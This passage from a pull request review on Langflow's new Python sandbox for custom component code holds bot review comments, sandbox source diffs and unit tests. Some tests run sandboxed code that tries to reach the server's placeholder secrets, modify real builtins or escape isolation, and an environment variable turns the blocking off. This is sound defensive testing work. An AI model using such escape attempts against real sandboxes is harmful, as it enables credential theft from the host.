- if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: - raise SecurityViolation( - f"Dangerous builtin '{name}' is blocked. " - f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." - ) + if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: + msg = ( + f"Dangerous builtin '{name}' is blocked. " + "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." + ) + raise SecurityViolation(msg) @@ - if module_name in BLOCKED_MODULES: - raise SecurityViolation( - f"Dangerous module '{module_name}' is blocked. " - f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." - ) + if module_name in BLOCKED_MODULES: + msg = ( + f"Dangerous module '{module_name}' is blocked. " + "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." + ) + raise SecurityViolation(msg)

These changes should clear the current Ruff complaints without altering sandbox behavior.

Also applies to: 96-139, 152-163

🧰 Tools

🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix

🤖 Prompt for AI Agents

In src/lfx/src/lfx/custom/sandbox.py around lines 17-18, 96-139, 152-163, update exception naming and simplify/clean up try/except and long exception messages: rename SecurityViolation to SecurityViolationError (or add a local noqa: N818 comment) to satisfy N818; replace try/except AttributeError blocks around getattr(builtins, name) with contextlib.suppress(AttributeError) to simplify control flow; and refactor any long f-string messages used in raise SecurityViolation(...) into a separately assigned message variable (message = f"...") and then raise the exception with that variable (raise SecurityViolationError(message)) to avoid EM102/TRY003/E501 style violations. Ensure imports are added (contextlib) and update all occurrences consistently without changing runtime behavior.

coderabbitai · 2025-11-24T01:30:34Z

src/lfx/src/lfx/custom/sandbox.py

+    essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"]
+    for name in essential_underscore_builtins:
+        if hasattr(builtins, name):
+            isolated_builtins[name] = getattr(builtins, name)
+
+    # Critical: Make __builtins__ point to this isolated copy, not the real one
+    # This prevents code from accessing the real builtins module
+    isolated_builtins["__builtins__"] = isolated_builtins.copy()
+
+    # Prevent access to the real builtins module
+    # If code tries to import builtins, they get our isolated version
+    class IsolatedBuiltinsModule:
+        """Fake builtins module that prevents escaping."""
+
+        def __getattr__(self, name: str) -> Any:
+            # Block dangerous builtins unless explicitly allowed
+            if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
+                raise SecurityViolation(
+                    f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
+                )
+            if name == "__builtins__":
+                return isolated_builtins
+            if hasattr(builtins, name):
+                return getattr(builtins, name)
+            raise AttributeError(f"module 'builtins' has no attribute '{name}'")
+
+    isolated_builtins["builtins"] = IsolatedBuiltinsModule()
+
+    return isolated_builtins


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Include __build_class__ in isolated builtins to support class definitions inside the sandbox

create_isolated_builtins currently copies only non-underscore names from builtins and then manually whitelists a few underscored ones ("__name__", "__doc__", etc.). It does not include __build_class__, which Python uses whenever a class statement is executed.

Consequence: executing code that actually runs a class definition within the sandbox (e.g., top-level class Foo: ... in code passed to execute_in_sandbox) will fail with NameError: __build_class__ is not defined, even when the code is otherwise totally benign. That’s surprising for callers and will make it hard to sandbox any code that defines classes.

You should add __build_class__ to the essential underscore builtins so it’s available in the sandbox:

- essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"] + essential_underscore_builtins = [ + "__name__", + "__doc__", + "__package__", + "__loader__", + "__spec__", + "__build_class__", # Needed for executing class definitions + ]

This keeps class definitions functional inside the sandbox without weakening your security guarantees.

Also applies to: 179-236

🏁 Script executed:

#!/bin/bash # Demonstrate the need for __build_class__ when executing a class definition in the sandbox. python - << 'PY' from lfx.custom.sandbox import create_isolated_builtins, execute_in_sandbox import ast code = "class Foo:\n pass\n" code_obj = compile(code, "<sandbox-test>", "exec") globals_ctx = {} try: execute_in_sandbox(code_obj, globals_ctx) print("Executed class definition successfully") except Exception as e: print("Exception during sandboxed class definition:", type(e).__name__, e) PY

Length of output: 115

--- 🏁 Script executed: ```shell #!/bin/bash # Locate the sandbox.py file fd -type f -name "sandbox.py"

Length of output: 170

🏁 Script executed:

#!/bin/bash # Examine the create_isolated_builtins function and surrounding context cat src/lfx/src/lfx/custom/sandbox.py | head -200

Length of output: 7266

🏁 Script executed:

#!/bin/bash # Search for any references to __build_class__ in the sandbox.py file rg -n "__build_class__" src/lfx/src/lfx/custom/sandbox.py

Length of output: 0

🏁 Script executed:

#!/bin/bash # Search for essential_underscore_builtins in the file rg -n "essential_underscore_builtins" src/lfx/src/lfx/custom/sandbox.py -A 5

Length of output: 419

--- 🏁 Script executed: ```shell #!/bin/bash # Examine lines 150-250 to see execute_in_sandbox and the second location (179-236) sed -n '150,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 3954

🏁 Script executed:

#!/bin/bash # Search for all uses of execute_in_sandbox to understand the impact rg -n "execute_in_sandbox" src/lfx/src/lfx/custom/sandbox.py -B 2 -A 2

Length of output: 155

Add __build_class__ to essential underscore builtins to support class definitions inside the sandbox

The verification confirms the issue: __build_class__ is missing from the essential_underscore_builtins list at line 111, and Python requires this builtin whenever a class statement executes. Any code attempt to define a class in the sandbox will fail with NameError: __build_class__ is not defined.

The suggested fix is correct and necessary:

- essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"] + essential_underscore_builtins = [ + "__name__", + "__doc__", + "__package__", + "__loader__", + "__spec__", + "__build_class__", # Needed for executing class definitions + ]

Apply this change at line 111 in src/lfx/src/lfx/custom/sandbox.py.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change

essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"]

for name in essential_underscore_builtins:

if hasattr(builtins, name):

isolated_builtins[name] = getattr(builtins, name)

# Critical: Make __builtins__ point to this isolated copy, not the real one

# This prevents code from accessing the real builtins module

isolated_builtins["__builtins__"] = isolated_builtins.copy()

# Prevent access to the real builtins module

# If code tries to import builtins, they get our isolated version

class IsolatedBuiltinsModule:

"""Fake builtins module that prevents escaping."""

def __getattr__(self, name: str) -> Any:

# Block dangerous builtins unless explicitly allowed

if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:

raise SecurityViolation(

f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."

)

if name == "__builtins__":

return isolated_builtins

if hasattr(builtins, name):

return getattr(builtins, name)

raise AttributeError(f"module 'builtins' has no attribute '{name}'")

isolated_builtins["builtins"] = IsolatedBuiltinsModule()

return isolated_builtins

essential_underscore_builtins = [

"__name__",

"__doc__",

"__package__",

"__loader__",

"__spec__",

"__build_class__", # Needed for executing class definitions

]

for name in essential_underscore_builtins:

if hasattr(builtins, name):

isolated_builtins[name] = getattr(builtins, name)

# Critical: Make __builtins__ point to this isolated copy, not the real one

# This prevents code from accessing the real builtins module

isolated_builtins["__builtins__"] = isolated_builtins.copy()

# Prevent access to the real builtins module

# If code tries to import builtins, they get our isolated version

class IsolatedBuiltinsModule:

"""Fake builtins module that prevents escaping."""

def __getattr__(self, name: str) -> Any:

# Block dangerous builtins unless explicitly allowed

if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:

raise SecurityViolation(

f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."

)

if name == "__builtins__":

return isolated_builtins

if hasattr(builtins, name):

return getattr(builtins, name)

raise AttributeError(f"module 'builtins' has no attribute '{name}'")

isolated_builtins["builtins"] = IsolatedBuiltinsModule()

return isolated_builtins

🧰 Tools

🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first

[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class

[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)

[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first

[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class

🤖 Prompt for AI Agents

In src/lfx/src/lfx/custom/sandbox.py around lines 111 to 139, the list essential_underscore_builtins is missing "__build_class__", causing any class definition inside the sandbox to raise NameError; add "__build_class__" to that list so the sandbox provides the class-construction builtin, ensuring class statements work correctly while keeping the rest of the isolated builtins behavior unchanged.

coderabbitai · 2025-11-24T01:30:34Z

src/lfx/tests/unit/custom/test_sandbox_isolation.py

+def test_sandbox_cannot_access_parent_globals():
+    """Test that sandboxed code cannot access parent function's globals."""
+    # Set a variable in the parent scope
+    parent_var = "should_not_be_accessible"
+
+    code = """
+def test():
+    # Try to access parent_var from parent scope
+    # If isolation were broken, this would work
+    return parent_var
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    # Execute in sandbox
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Try to call the function
+    test_func = exec_globals["test"]
+
+    # Should raise NameError because parent_var is not accessible
+    with pytest.raises(NameError):
+        test_func()
+
+
+def test_sandbox_cannot_modify_parent_globals():
+    """Test that sandboxed code cannot modify parent scope's globals."""
+    parent_dict = {"value": "original"}
+
+    code = """
+def test():
+    # Try to modify parent_dict
+    # If isolation were broken, this would modify the real parent_dict
+    parent_dict["value"] = "modified"
+    return parent_dict["value"]
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function - should fail because parent_dict is not accessible
+    test_func = exec_globals["test"]
+
+    with pytest.raises(NameError):
+        test_func()
+
+    # Verify parent_dict was not modified
+    assert parent_dict["value"] == "original"
+
+
+def test_sandbox_isolated_builtins():
+    """Test that sandbox uses isolated builtins, not real ones."""
+    # Create a marker in real builtins (simulating server state)
+    import builtins
+
+    original_builtins_len = len(dir(builtins))
+
+    code = """
+def test():
+    import builtins
+    # Try to access real builtins
+    # If isolation were broken, we could modify real builtins
+    builtins.ESCAPE_TEST = "should_not_exist"
+    return hasattr(builtins, 'ESCAPE_TEST')
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+    result = test_func()
+
+    # Should return False or True but not affect real builtins
+    # Verify real builtins wasn't modified
+    assert not hasattr(builtins, "ESCAPE_TEST")
+    assert len(dir(builtins)) == original_builtins_len
+
+
+def test_sandbox_fresh_namespace_per_execution():
+    """Test that each execution gets a fresh isolated namespace."""
+    code1 = """
+GLOBAL_VAR = "first_execution"
+def test():
+    return GLOBAL_VAR
+"""
+    code_obj1 = compile(code1, "<test>", "exec")
+    exec_globals1 = {}
+    execute_in_sandbox(code_obj1, exec_globals1)
+
+    # Second execution with different code
+    code2 = """
+def test():
+    # Try to access GLOBAL_VAR from previous execution
+    # If isolation were broken, this would work
+    return GLOBAL_VAR
+"""
+    code_obj2 = compile(code2, "<test>", "exec")
+    exec_globals2 = {}
+    execute_in_sandbox(code_obj2, exec_globals2)
+
+    # Should raise NameError because GLOBAL_VAR doesn't exist in this execution
+    test_func = exec_globals2["test"]
+    with pytest.raises(NameError):
+        test_func()
+
+
+def test_sandbox_cannot_access_frame_locals():
+    """Test that sandboxed code cannot access caller's local variables."""
+
+    def caller_function():
+        local_var = "should_not_be_accessible"
+
+        code = """
+def test():
+    # Try to access local_var from caller
+    # If isolation were broken, this would work
+    return local_var
+"""
+        code_obj = compile(code, "<test>", "exec")
+        exec_globals = {}
+
+        execute_in_sandbox(code_obj, exec_globals)
+
+        # Call the function
+        test_func = exec_globals["test"]
+
+        # Should raise NameError because local_var is not accessible
+        with pytest.raises(NameError):
+            test_func()
+
+    caller_function()
+


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Sandbox tests assume exec_globals is mutated, but execute_in_sandbox does not currently do that

Across these tests you call:

exec_globals = {} execute_in_sandbox(code_obj, exec_globals) test_func = exec_globals["test"]

and then assert behavior by calling test_func() (e.g., expecting NameError). However, execute_in_sandbox creates its own sandbox_globals dict, updates it with exec_globals, and never writes symbols back into exec_globals. As a result exec_globals stays empty and exec_globals["test"] will raise KeyError before any of the pytest.raises(...) blocks are exercised.

You likely want one of:

Keep sandbox one‑way (safer) and update tests to assert on errors from execute_in_sandbox itself, or to evaluate access attempts at module level inside the sandboxed code (so execute_in_sandbox raises the NameError/SecurityViolation you check), rather than trying to call sandboxed functions via exec_globals; or

Change execute_in_sandbox’s contract so it exports selected symbols (e.g., top‑level defs) back into exec_globals after execution, then your exec_globals["test"] pattern would work, but that does loosen the API surface of the sandbox.

Right now, as written, these tests won’t be validating isolation properties but will instead fail on lookup of "test".

Also applies to: 179-220

🏁 Script executed:

#!/bin/bash # Verify current execute_in_sandbox behavior with respect to exec_globals. python - << 'PY' from lfx.custom.sandbox import execute_in_sandbox import ast code = "def test():\n return 42\n" code_obj = compile(code, "<test>", "exec") exec_globals = {} execute_in_sandbox(code_obj, exec_globals) print("exec_globals keys after execute_in_sandbox:", list(exec_globals.keys())) PY

Length of output: 115

--- 🏁 Script executed: ```shell #!/bin/bash # Locate execute_in_sandbox function definition rg -n "def execute_in_sandbox" --type=py

Length of output: 114

🏁 Script executed:

#!/bin/bash # Find sandbox-related module files fd -e py "sandbox" --type f

Length of output: 136

🏁 Script executed:

#!/bin/bash # Read execute_in_sandbox implementation cat src/lfx/src/lfx/custom/sandbox.py | sed -n '179,250p'

Length of output: 2584

🏁 Script executed:

#!/bin/bash # Check if test_sandbox_security.py has similar patterns or different approach head -100 src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 3707

Sandbox tests assume exec_globals is mutated, but execute_in_sandbox does not currently do that

Across these tests you call:

exec_globals = {} execute_in_sandbox(code_obj, exec_globals) test_func = exec_globals["test"]

and then assert behavior by calling test_func() (e.g., expecting NameError). However, execute_in_sandbox creates its own sandbox_globals dict, reads from exec_globals via update(), and never writes symbols back into exec_globals. As a result exec_globals stays empty and exec_globals["test"] will raise KeyError before any of the pytest.raises(...) blocks are exercised.

You likely want one of:

Keep sandbox one‑way (safer) and update tests to assert on errors from execute_in_sandbox itself, or to evaluate access attempts at module level inside the sandboxed code (so execute_in_sandbox raises the NameError/SecurityViolation you check), rather than trying to call sandboxed functions via exec_globals; or

Change execute_in_sandbox's contract so it exports selected symbols (e.g., top‑level defs) back into exec_globals after execution, then your exec_globals["test"] pattern would work, but that does loosen the API surface of the sandbox.

Right now, as written, these tests won't be validating isolation properties but will instead fail on lookup of "test".

coderabbitai · 2025-11-24T01:30:34Z

src/lfx/tests/unit/custom/test_sandbox_security.py

+    server_api_key = "sk-secret-key-12345"
+    server_db_password = "db_password_secret"
+    server_config = {"api_key": server_api_key, "database_url": "postgresql://user:password@localhost/db"}


⚠️ Potential issue | 🟠 Major

Fake API keys will trigger gitleaks and other secret scanners

The hard‑coded strings like:

server_api_key = "sk-secret-key-12345" (Line 29)

self.api_key = "sk-secret-12345" (Line 63)

match generic API‑key patterns and are already being flagged by gitleaks. Even though these are clearly test values, they will cause CI noise or failures.

Consider changing them to values that don’t resemble real keys (and avoid common prefixes like sk-), e.g.:

- server_api_key = "sk-secret-key-12345" + server_api_key = "FAKE_SERVER_API_KEY_FOR_TESTS" @@ - self.api_key = "sk-secret-12345" + self.api_key = "FAKE_SERVER_CONFIG_API_KEY_FOR_TESTS"

or add explicit allowlist annotations consistent with your secret‑scanning configuration.

Also applies to: 63-66

🧰 Tools

🪛 Gitleaks (8.29.0)

[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

🤖 Prompt for AI Agents

In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 29-31 and 63-66, replace hard-coded strings that resemble real API keys (e.g. values with sk- or sk-secret prefixes) with clearly non-secret test identifiers or reference test fixtures/env vars, or add an explicit secret-scan allowlist annotation per our CI configuration; ensure new values do not match common API-key patterns (avoid prefixes like "sk-", long hex/base64 blobs, or "secret") and prefer simple labels such as "test-api-key-1" or read the value from a test-only config/env var, updating tests accordingly.

coderabbitai · 2025-11-24T01:30:34Z

src/lfx/tests/unit/custom/test_sandbox_security.py

+    code = """
+def test():
+    # Try to access server's Python variables containing secrets
+    # If isolation is broken, these would be accessible
+    return server_api_key, server_db_password, server_config
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+
+    # CRITICAL: Should raise NameError - server secrets are not accessible
+    # This is what prevents credential theft
+    with pytest.raises(NameError):
+        test_func()


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

exec_globals["test"] never populated by execute_in_sandbox

All tests in this file follow the pattern:

exec_globals = {}

execute_in_sandbox(code_obj, exec_globals)

test_func = exec_globals["test"]

with pytest.raises(NameError): test_func()

However, the current execute_in_sandbox implementation constructs its own sandbox_globals dict, merges exec_globals into it, and then executes exec(code_obj, sandbox_globals, sandbox_locals) without writing anything back to exec_globals. That means exec_globals remains empty and exec_globals["test"] will raise KeyError before your pytest.raises(NameError) assertions ever run. The same issue affects every test using this pattern (lines 33‑50, 69‑86, 98‑129, 140‑160, 172‑188, 195‑214, 226‑249, 261‑275).

Two options:

Adjust tests to assert on the exception raised by execute_in_sandbox itself (and call test() from within the code string), e.g.:

- code = """ -def test(): - # Try to access server's Python variables containing secrets - # If isolation is broken, these would be accessible - return server_api_key, server_db_password, server_config -""" + code = """ +def test(): + # Try to access server's Python variables containing secrets + # If isolation is broken, these would be accessible + return server_api_key, server_db_password, server_config + +# Call inside the sandbox so NameError is raised during execute_in_sandbox +test() +""" @@ - code_obj = compile(code, "<test>", "exec") - exec_globals = {} - - execute_in_sandbox(code_obj, exec_globals) - - # Call the function - test_func = exec_globals["test"] - - # CRITICAL: Should raise NameError - server secrets are not accessible - # This is what prevents credential theft - with pytest.raises(NameError): - test_func() + code_obj = compile(code, "<test>", "exec") + exec_globals = {} + + # CRITICAL: Should raise NameError - server secrets are not accessible + # This is what prevents credential theft + with pytest.raises(NameError): + execute_in_sandbox(code_obj, exec_globals)

Or, if the intended contract is that sandboxed definitions are exported back into exec_globals, update execute_in_sandbox to propagate selected names (e.g., functions) out of the internal sandbox_globals into exec_globals.

Right now, the tests and the sandbox API are not aligned, and the assertions won’t be exercising the intended NameError behavior.

🏁 Script executed:

#!/bin/bash # Find execute_in_sandbox function definition rg -n "def execute_in_sandbox" --type py

Length of output: 114

🏁 Script executed:

#!/bin/bash # Find where execute_in_sandbox is imported/used in test file rg -n "execute_in_sandbox" src/lfx/tests/unit/custom/test_sandbox_security.py -B2 -A2

Length of output: 1022

🏁 Script executed:

#!/bin/bash # Get the full test file to understand structure cat src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 9640

🏁 Script executed:

#!/bin/bash # Find all Python files that might contain execute_in_sandbox definition fd -e py -x rg -l "def execute_in_sandbox" {} \;

Length of output: 35

🏁 Script executed:

#!/bin/bash # Search more broadly for execute_in_sandbox in the codebase rg -n "execute_in_sandbox" --type py -C3

Length of output: 12538

🏁 Script executed:

#!/bin/bash # Get the execute_in_sandbox function implementation sed -n '179,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 2584

🏁 Script executed:

#!/bin/bash # Get full sandbox.py file for complete context cat src/lfx/src/lfx/custom/sandbox.py

Length of output: 8824

Tests fail with KeyError before asserting intended NameError behavior

The review comment is correct. In execute_in_sandbox, definitions created by exec(code_obj, sandbox_globals, sandbox_locals) are placed into sandbox_globals, not the passed-in exec_globals parameter. Since exec_globals is never updated after execution, the test pattern fails at exec_globals["test"] with KeyError before the NameError assertions can run.

This affects all tests in the file: lines 33–50, 69–86, 98–129, 140–160, 172–188, 195–214, 226–249, 261–275.

Choose one solution:

Move the function call into the code string so NameError is raised during execute_in_sandbox:

code = """ def test(): return server_api_key, server_db_password, server_config test() """ with pytest.raises(NameError): execute_in_sandbox(code_obj, exec_globals)

Update execute_in_sandbox to propagate selected definitions (e.g., functions) back into exec_globals after execution.

jordanrfrazier added 4 commits November 23, 2025 19:44

Add sandbox to exec call in validate endpoint

87bf735

Also allow langflow.* modules

912836b

update docs

3019e1f

Add env var to base

0328ae8

jordanrfrazier requested review from dkaushik94 and ogabrielluiz November 24, 2025 01:05

autofix-ci bot added 2 commits November 24, 2025 01:07

[autofix.ci] apply automated fixes

f5cf8ff

[autofix.ci] apply automated fixes (attempt 2/3)

b574590

coderabbitai bot reviewed Nov 24, 2025

View reviewed changes

		from lfx.custom.sandbox import create_isolated_import, execute_in_sandbox
		from lfx.field_typing.constants import CUSTOM_COMPONENT_SUPPORTED_TYPES, DEFAULT_IMPORT_STRING

		"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str \| None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = 